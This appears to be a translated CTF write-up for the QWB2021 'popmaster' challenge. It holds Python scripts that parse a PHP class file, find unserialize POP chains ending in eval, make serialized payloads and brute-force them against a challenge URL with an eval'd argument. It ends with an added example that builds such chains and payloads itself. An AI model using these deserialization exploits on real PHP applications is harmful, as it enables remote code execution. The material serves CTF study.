[QWB2021 Quals]popmaster

Solution steps

Close to 100k lines of code. At the time I forced myself to stare at it for 2 hours, but I couldn't write a script either, so I was simply done for.
Now I have finally found a script that reproduces it. Without further ado, here is the script from a master, taken from https://www.freebuf.com/articles/web/279680.html

import re, os, subprocess

targetFunction = 'GYGtGO'   # method that index.php calls on the unserialized object
with open('class.php', 'r') as f:
    File = f.read()
MyClass = []   # one dict per class: name, its public property, its methods and what they call
AllPop = []    # every candidate chain as a list of class names, outermost first

def main():
    ParseClass(File)
    findEval(targetFunction)
    makePoc()

def ParseClass(File):
    global MyClass
    classes = re.findall(r'(class\s(.+?)\{([\S\s]*?)\}\n\n)', File)
    # classes[n][0] whole class block  classes[n][1] class name
    for i in classes:
        classItem = {}
        classItem['className'] = i[1]
        classItem['propertyName'] = re.findall(r'public\s\$(.+?);', i[0])[0]
        functionValue = re.findall(r'(public\sfunction\s(.+?)\(\$(.+?)\)\{(([\S\s]+?);\n\n[\S\s]+?)\})', i[0])

        FunctionItem = {}
        for f in functionValue:
            # f[1] method name  f[2] parameter name  f[3] method body
            # record the method name reached by every `$this->prop->method(...)` call in the body
            FunctionItem[f[1]] = []
            this2Func = re.findall(r'([\s\t]\$this->.+?->(.+?)\(.+?\));', f[3])
            for t in this2Func:
                FunctionItem[f[1]].append(t[1])
        classItem['function'] = FunctionItem
        MyClass.append(classItem)

def findEval(startFunc, path=()):
    # Depth-first walk starting at the entry method: every class that defines a
    # method of that name extends the current path, and a method that makes no
    # further call ends a chain. path is a tuple of (className, methodName) so
    # each recursive call keeps its own copy, and a state already on the path is
    # skipped so a call cycle in class.php cannot recurse forever.
    global AllPop
    for classItem in MyClass:
        nexts = classItem['function'].get(startFunc)
        if nexts is None:
            continue
        state = (classItem['className'], startFunc)
        if state in path:
            continue
        newPath = path + (state,)
        if len(nexts) == 0:
            AllPop.append([cls for cls, _ in newPath])
        for nexted in nexts:
            findEval(nexted, newPath)

def makePoc():
    # Re-declare every class with only its property, nest the chain's objects as
    # new A(new B(new C())) and let PHP's own serialize() produce the payload.
    poc = "<?php\n"
    for i in MyClass:
        poc += '''class %s{
    public function __construct($a = 0){
        $this -> %s = $a;
    }
}
''' % (i['className'], i['propertyName'])
    for item in AllPop:
        poc += 'file_put_contents("poc.txt", serialize('
        for clsName in item:
            poc += 'new %s(' % (clsName)
        poc += ')' * len(item)
        poc += ') . "\\r\\n", FILE_APPEND);\n'
    with open('poc.php', 'w') as f:
        f.write(poc)
    subprocess.run(['php', 'poc.php'], check=True)   # block until php has written poc.txt
    print('poc.txt generated, now brute-force the POP chains with the attack script...')
    # os.remove('poc.php')

if __name__ == '__main__':
    main()

First use the script above to generate all POP chains; they are written to poc.txt, one serialized payload per line.
Then use the script below to brute-force the chains against the target.

import requests, time

url = 'http://99303909-d2bb-4049-afa4-93f115abf73b.node4.buuoj.cn:81/'
fileName = 'poc.txt'
# argv is eval'd once a chain reaches the sink; a marker string in the
# response tells us which candidate chain actually works
marker = 'a' * 20
argv = 'var_dump("%s");//' % marker

def readFile():
    # one payload per line; drop the \r\n left by file_put_contents and blank lines
    with open(fileName, 'r') as f:
        return [line.strip() for line in f if line.strip()]

def attack(POP):
    # let requests URL-encode the serialized payload instead of pasting it raw
    params = {'pop': POP, 'argv': argv}
    result = requests.get(url, params=params)
    if result.status_code != 200:
        time.sleep(3)
        result = requests.get(url, params=params)
    if marker in result.text:
        print('----------------------------------')
        print(POP)
        print('----------------------------------')
        return True
    return False

if __name__ == '__main__':
    for POP in readFile():
        attack(POP)
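As an added example, not code from the original post or from the freebuf script, the two steps above (chain discovery, then payload generation) done in one Python file on a small constructed class.php fragment. Its parser walks braces instead of relying on the blank-line layout the regexes above expect, it keeps only chains whose last method actually contains `eval(` rather than every dead-end leaf, and it builds the `serialize()` output itself so no php binary is needed. The class names Alpha/Beta/Gamma/Delta, the properties prop1..prop4 and the entry method name `entry` are all made up; on the real challenge the entry method is GYGtGO.

```python
import re

# Constructed sample in the style of the challenge's class.php (not the real file).
SAMPLE_PHP = r'''
class Alpha{
    public $prop1;
    public function __construct($a = 0){
        $this->prop1 = $a;
    }
    public function entry($param){
        $this->prop1->step1($param);
    }
}

class Beta{
    public $prop2;
    public function step1($param){
        $this->prop2->step2($param);
    }
    public function dead($param){
        return $param;
    }
}

class Gamma{
    public $prop3;
    public function step2($param){
        eval($param);
    }
}

class Delta{
    public $prop4;
    public function step1($param){
        echo $param;
    }
}
'''

CLASS_RE = re.compile(r'class\s+(\w+)\s*\{')
METHOD_RE = re.compile(r'public\s+function\s+(\w+)\s*\([^)]*\)\s*\{')
PROP_RE = re.compile(r'public\s+\$(\w+)\s*;')
CALL_RE = re.compile(r'\$this->\w+->(\w+)\s*\(')   # $this->prop->method(


def _block(text, open_idx):
    """Return the body of the {...} block whose '{' sits at open_idx."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == '{':
            depth += 1
        elif text[i] == '}':
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    raise ValueError('unbalanced braces')


def parse_classes(src):
    """class name -> {'prop': public property, 'methods': {name: {'calls': [...], 'sink': bool}}}"""
    classes = {}
    for m in CLASS_RE.finditer(src):
        body = _block(src, m.end() - 1)
        prop = PROP_RE.search(body)
        methods = {}
        for fm in METHOD_RE.finditer(body):
            fbody = _block(body, fm.end() - 1)
            methods[fm.group(1)] = {'calls': CALL_RE.findall(fbody),
                                    'sink': 'eval(' in fbody}
        classes[m.group(1)] = {'prop': prop.group(1) if prop else None, 'methods': methods}
    return classes


def find_chains(classes, entry, only_sinks=True):
    """Depth-first walk from the entry method; a (class, method) state seen twice on
    one path is pruned so call cycles terminate. Returns chains as class lists."""
    chains = []

    def walk(method, path):
        for cname, cinfo in classes.items():
            minfo = cinfo['methods'].get(method)
            if minfo is None or (cname, method) in path:
                continue
            new_path = path + [(cname, method)]
            if minfo['sink'] or (not only_sinks and not minfo['calls']):
                chains.append([c for c, _ in new_path])
            for nxt in minfo['calls']:
                walk(nxt, new_path)

    walk(entry, [])
    return chains


def php_serialize(classes, chain, innermost=0):
    """serialize() output of chain[0](chain[1](...chain[-1](innermost))) with public props."""
    value = 'i:%d;' % innermost
    for cname in reversed(chain):
        prop = classes[cname]['prop']
        value = 'O:%d:"%s":1:{s:%d:"%s";%s}' % (len(cname), cname, len(prop), prop, value)
    return value


SAMPLE_CLASSES = parse_classes(SAMPLE_PHP)

if __name__ == '__main__':
    for chain in find_chains(SAMPLE_CLASSES, 'entry'):
        print(' -> '.join(chain))
        print(php_serialize(SAMPLE_CLASSES, chain))
```

With `only_sinks=False` the walk also returns the Alpha -> Delta dead end, which is exactly the kind of candidate the brute-force script above would otherwise have to send to the target; the serialized string for the working chain is what would go into the `pop` parameter.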

The chains are damn long; passing one in makes the target box hang for 5-6 s, really impressive!
